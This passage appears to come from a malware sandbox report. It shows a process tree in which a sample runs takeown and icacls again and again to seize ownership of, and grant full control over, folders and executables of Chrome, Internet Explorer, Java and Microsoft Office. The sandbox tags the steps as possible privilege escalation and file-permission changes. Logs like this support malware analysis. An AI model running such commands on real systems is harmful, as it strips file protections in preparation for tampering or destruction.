  "C:\windows\system32\icacls.exe" "C:\Program Files\Google\Chrome\Application\133.0.6943.60\WidevineCdm\_platform_specific" /grant Administrators:F
  2⤵
  PID:2996
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Google\Chrome\Application\133.0.6943.60\WidevineCdm\_platform_specific\win_x64" /a
  2⤵
  - Modifies file permissions
  PID:3676
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Google\Chrome\Application\133.0.6943.60\WidevineCdm\_platform_specific\win_x64" /grant Administrators:F
  2⤵
  PID:4704
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Google\Chrome\Application\SetupMetrics" /a
  2⤵
  PID:4564
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Google\Chrome\Application\SetupMetrics" /grant Administrators:F
  2⤵
  PID:4940
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Internet Explorer" /a
  2⤵
  PID:3472
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Internet Explorer" /grant Administrators:F
  2⤵
  PID:3360
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Internet Explorer\ExtExport.exe" /a
  2⤵
  PID:5700
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Internet Explorer\ExtExport.exe" /grant Administrators:F
  2⤵
  PID:6044
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Internet Explorer\de-DE" /a
  2⤵
  PID:3204
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Internet Explorer\de-DE" /grant Administrators:F
  2⤵
  PID:1576
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Internet Explorer\en-US" /a
  2⤵
  PID:1668
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Internet Explorer\en-US" /grant Administrators:F
  2⤵
  PID:5080
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Internet Explorer\es-ES" /a
  2⤵
  PID:4984
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Internet Explorer\es-ES" /grant Administrators:F
  2⤵
  PID:4492
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Internet Explorer\fr-FR" /a
  2⤵
  PID:4408
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Internet Explorer\fr-FR" /grant Administrators:F
  2⤵
  PID:4764
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:2264
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Internet Explorer\images" /a
  2⤵
  - Modifies file permissions
  PID:5892
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Internet Explorer\images" /grant Administrators:F
  2⤵
  PID:1228
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Internet Explorer\it-IT" /a
  2⤵
  PID:5912
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Internet Explorer\it-IT" /grant Administrators:F
  2⤵
  PID:6092
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Internet Explorer\ja-JP" /a
  2⤵
  PID:4804
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Internet Explorer\ja-JP" /grant Administrators:F
  2⤵
  PID:296
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:1500
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Internet Explorer\SIGNUP" /a
  2⤵
  PID:3632
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Internet Explorer\SIGNUP" /grant Administrators:F
  2⤵
  - Possible privilege escalation attempt
  PID:2572
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Internet Explorer\uk-UA" /a
  2⤵
  PID:2272
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Internet Explorer\uk-UA" /grant Administrators:F
  2⤵
  PID:852
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java" /a
  2⤵
  PID:4748
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java" /grant Administrators:F
  2⤵
  - Possible privilege escalation attempt
  PID:1656
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk-1.8" /a
  2⤵
  - Modifies file permissions
  PID:5136
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk-1.8" /grant Administrators:F
  2⤵
  PID:856
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk-1.8\bin" /a
  2⤵
  PID:4456
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk-1.8\bin" /grant Administrators:F
  2⤵
  PID:5168
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk-1.8\bin\appletviewer.exe" /a
  2⤵
  - Possible privilege escalation attempt
  PID:3844
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk-1.8\bin\appletviewer.exe" /grant Administrators:F
  2⤵
  - Modifies file permissions
  PID:636
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:5748
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk-1.8\include" /a
  2⤵
  PID:3112
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk-1.8\include" /grant Administrators:F
  2⤵
  PID:5716
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk-1.8\include\win32" /a
  2⤵
  PID:6124
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:5464
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk-1.8\include\win32" /grant Administrators:F
  2⤵
  PID:5220
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk-1.8\include\win32\bridge" /a
  2⤵
  - Modifies file permissions
  PID:5044
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk-1.8\include\win32\bridge" /grant Administrators:F
  2⤵
  - Modifies file permissions
  PID:4844
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk-1.8\jre" /a
  2⤵
  - Possible privilege escalation attempt
  PID:5284
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk-1.8\jre" /grant Administrators:F
  2⤵
  PID:2632
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk-1.8\jre\bin" /a
  2⤵
  - Modifies file permissions
  PID:4780
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk-1.8\jre\bin" /grant Administrators:F
  2⤵
  - Possible privilege escalation attempt
  PID:4492
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk-1.8\jre\bin\jabswitch.exe" /a
  2⤵
  PID:3320
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk-1.8\jre\bin\jabswitch.exe" /grant Administrators:F
  2⤵
  PID:4516
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk-1.8\jre\bin\dtplugin" /a
  2⤵
  PID:3476
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk-1.8\jre\bin\dtplugin" /grant Administrators:F
  2⤵
  - Possible privilege escalation attempt
  - Modifies file permissions
  PID:4544
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk-1.8\jre\bin\plugin2" /a
  2⤵
  PID:5108
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk-1.8\jre\bin\plugin2" /grant Administrators:F
  2⤵
  PID:4876
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk-1.8\jre\bin\server" /a
  2⤵
  - Possible privilege escalation attempt
  PID:4668
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk-1.8\jre\bin\server" /grant Administrators:F
  2⤵
  PID:3108
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk-1.8\jre\legal" /a
  2⤵
  PID:2684
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk-1.8\jre\legal" /grant Administrators:F
  2⤵
  PID:3852
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk-1.8\jre\legal\javafx" /a
  2⤵
  PID:4856
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk-1.8\jre\legal\javafx" /grant Administrators:F
  2⤵
  - Possible privilege escalation attempt
  PID:2572
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk-1.8\jre\legal\jdk" /a
  2⤵
  PID:4840
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk-1.8\jre\legal\jdk" /grant Administrators:F
  2⤵
  PID:3232
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk-1.8\jre\lib" /a
  2⤵
  PID:5188
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk-1.8\jre\lib" /grant Administrators:F
  2⤵
  PID:4952
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk-1.8\jre\lib\amd64" /a
  2⤵
  PID:1692
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk-1.8\jre\lib\amd64" /grant Administrators:F
  2⤵
  PID:3220
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk-1.8\jre\lib\applet" /a
  2⤵
  PID:4456
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk-1.8\jre\lib\applet" /grant Administrators:F
  2⤵
  - Modifies file permissions
  PID:232
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk-1.8\jre\lib\cmm" /a
  2⤵
  PID:1812
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk-1.8\jre\lib\cmm" /grant Administrators:F
  2⤵
  PID:2640
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk-1.8\jre\lib\deploy" /a
  2⤵
  PID:1464
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk-1.8\jre\lib\deploy" /grant Administrators:F
  2⤵
  PID:2804
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk-1.8\jre\lib\ext" /a
  2⤵
  PID:2180
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk-1.8\jre\lib\ext" /grant Administrators:F
  2⤵
  - Possible privilege escalation attempt
  PID:4468
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk-1.8\jre\lib\fonts" /a
  2⤵
  PID:228
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk-1.8\jre\lib\fonts" /grant Administrators:F
  2⤵
  PID:2036
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk-1.8\jre\lib\images" /a
  2⤵
  PID:2900
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk-1.8\jre\lib\images" /grant Administrators:F
  2⤵
  PID:5400
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk-1.8\jre\lib\images\cursors" /a
  2⤵
  PID:5376
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:4940
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk-1.8\jre\lib\images\cursors" /grant Administrators:F
  2⤵
  PID:4780
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk-1.8\jre\lib\jfr" /a
  2⤵
  PID:2956
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk-1.8\jre\lib\jfr" /grant Administrators:F
  2⤵
  PID:3268
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk-1.8\jre\lib\management" /a
  2⤵
  PID:4636
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk-1.8\jre\lib\management" /grant Administrators:F
  2⤵
  PID:208
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk-1.8\jre\lib\security" /a
  2⤵
  - Possible privilege escalation attempt
  PID:732
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk-1.8\jre\lib\security" /grant Administrators:F
  2⤵
  PID:4288
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk-1.8\jre\lib\security\policy" /a
  2⤵
  PID:1500
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk-1.8\jre\lib\security\policy" /grant Administrators:F
  2⤵
  PID:3772
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:1640
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk-1.8\jre\lib\security\policy\limited" /a
  2⤵
  PID:3108
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk-1.8\jre\lib\security\policy\limited" /grant Administrators:F
  2⤵
  PID:5480
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk-1.8\jre\lib\security\policy\unlimited" /a
  2⤵
  PID:3852
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk-1.8\jre\lib\security\policy\unlimited" /grant Administrators:F
  2⤵
  PID:3632
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk-1.8\legal" /a
  2⤵
  PID:4040
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk-1.8\legal" /grant Administrators:F
  2⤵
  PID:5348
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk-1.8\legal\javafx" /a
  2⤵
  PID:2408
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk-1.8\legal\javafx" /grant Administrators:F
  2⤵
  - Modifies file permissions
  PID:3856
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:4100
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk-1.8\legal\jdk" /a
  2⤵
  - Possible privilege escalation attempt
  PID:1468
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk-1.8\legal\jdk" /grant Administrators:F
  2⤵
  PID:5836
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk-1.8\lib" /a
  2⤵
  PID:2936
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk-1.8\lib" /grant Administrators:F
  2⤵
  PID:3128
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jre-1.8" /a
  2⤵
  - Modifies file permissions
  PID:2580
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jre-1.8" /grant Administrators:F
  2⤵
  PID:4456
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jre-1.8\bin" /a
  2⤵
  PID:4268
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jre-1.8\bin" /grant Administrators:F
  2⤵
  PID:1216
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jre-1.8\bin\jabswitch.exe" /a
  2⤵
  PID:3276
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jre-1.8\bin\jabswitch.exe" /grant Administrators:F
  2⤵
  PID:4844
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jre-1.8\bin\dtplugin" /a
  2⤵
  PID:5208
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jre-1.8\bin\dtplugin" /grant Administrators:F
  2⤵
  - Possible privilege escalation attempt
  - Modifies file permissions
  PID:5496
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jre-1.8\bin\plugin2" /a
  2⤵
  PID:3472
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jre-1.8\bin\plugin2" /grant Administrators:F
  2⤵
  PID:4564
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:6044
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jre-1.8\bin\server" /a
  2⤵
  - Possible privilege escalation attempt
  PID:5376
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jre-1.8\bin\server" /grant Administrators:F
  2⤵
  PID:4984
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jre-1.8\legal" /a
  2⤵
  PID:2308
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:4764
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jre-1.8\legal" /grant Administrators:F
  2⤵
  PID:3088
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jre-1.8\legal\javafx" /a
  2⤵
  PID:2520
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jre-1.8\legal\javafx" /grant Administrators:F
  2⤵
  PID:5664
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jre-1.8\legal\jdk" /a
  2⤵
  PID:288
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jre-1.8\legal\jdk" /grant Administrators:F
  2⤵
  PID:4544
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jre-1.8\lib" /a
  2⤵
  PID:756
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jre-1.8\lib" /grant Administrators:F
  2⤵
  PID:920
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jre-1.8\lib\amd64" /a
  2⤵
  PID:3792
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:4620
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jre-1.8\lib\amd64" /grant Administrators:F
  2⤵
  PID:2124
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:5116
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jre-1.8\lib\applet" /a
  2⤵
  PID:5688
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jre-1.8\lib\applet" /grant Administrators:F
  2⤵
  - Modifies file permissions
  PID:4736
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jre-1.8\lib\cmm" /a
  2⤵
  PID:540
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jre-1.8\lib\cmm" /grant Administrators:F
  2⤵
  PID:5696
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jre-1.8\lib\deploy" /a
  2⤵
  PID:4584
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jre-1.8\lib\deploy" /grant Administrators:F
  2⤵
  PID:2572
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jre-1.8\lib\ext" /a
  2⤵
  PID:5040
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jre-1.8\lib\ext" /grant Administrators:F
  2⤵
  PID:1380
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jre-1.8\lib\fonts" /a
  2⤵
  PID:5976
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jre-1.8\lib\fonts" /grant Administrators:F
  2⤵
  PID:2092
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jre-1.8\lib\images" /a
  2⤵
  PID:5288
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jre-1.8\lib\images" /grant Administrators:F
  2⤵
  PID:2248
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jre-1.8\lib\images\cursors" /a
  2⤵
  PID:2960
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jre-1.8\lib\images\cursors" /grant Administrators:F
  2⤵
  PID:5408
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jre-1.8\lib\jfr" /a
  2⤵
  PID:3112
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jre-1.8\lib\jfr" /grant Administrators:F
  2⤵
  PID:1460
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jre-1.8\lib\management" /a
  2⤵
  PID:5144
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jre-1.8\lib\management" /grant Administrators:F
  2⤵
  - Modifies file permissions
  PID:1260
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:1668
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jre-1.8\lib\security" /a
  2⤵
  - Modifies file permissions
  PID:3500
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:5700
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jre-1.8\lib\security" /grant Administrators:F
  2⤵
  PID:4552
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jre-1.8\lib\security\policy" /a
  2⤵
  PID:1624
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jre-1.8\lib\security\policy" /grant Administrators:F
  2⤵
  PID:2164
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jre-1.8\lib\security\policy\limited" /a
  2⤵
  - Modifies file permissions
  PID:5892
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jre-1.8\lib\security\policy\limited" /grant Administrators:F
  2⤵
  PID:2516
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jre-1.8\lib\security\policy\unlimited" /a
  2⤵
  PID:3720
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jre-1.8\lib\security\policy\unlimited" /grant Administrators:F
  2⤵
  PID:4668
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office" /a
  2⤵
  PID:5376
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office" /grant Administrators:F
  2⤵
  - Modifies file permissions
  PID:1500
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\Office16" /a
  2⤵
  PID:948
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\Office16" /grant Administrators:F
  2⤵
  PID:6136
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\Office16\OSPPREARM.EXE" /a
  2⤵
  PID:5912
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\Office16\OSPPREARM.EXE" /grant Administrators:F
  2⤵
  PID:2272
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\PackageManifests" /a
  2⤵
  - Modifies file permissions
  PID:1448
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\PackageManifests" /grant Administrators:F
  2⤵
  - Possible privilege escalation attempt
  - Modifies file permissions
  PID:1780
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\root" /a
  2⤵
  PID:3632
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\root" /grant Administrators:F
  2⤵
  PID:2200
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\root\Client" /a
  2⤵
  PID:3220
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\root\Client" /grant Administrators:F
  2⤵
  PID:4740
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\root\Client\AppVDllSurrogate32.exe" /a
  2⤵
  - Modifies file permissions
  PID:5316
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\root\Client\AppVDllSurrogate32.exe" /grant Administrators:F
  2⤵
  PID:5472
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\root\Document Themes 16" /a
  2⤵
  PID:5128
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\root\Document Themes 16" /grant Administrators:F
  2⤵
  PID:2936
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Colors" /a
  2⤵
  PID:2740
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Colors" /grant Administrators:F
  2⤵
  PID:5708
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Effects" /a
  2⤵
  - Modifies file permissions
  PID:5408
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Effects" /grant Administrators:F
  2⤵
  PID:4336
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Fonts" /a
  2⤵
  PID:5788
- C:\windows\system32\icacls.exe
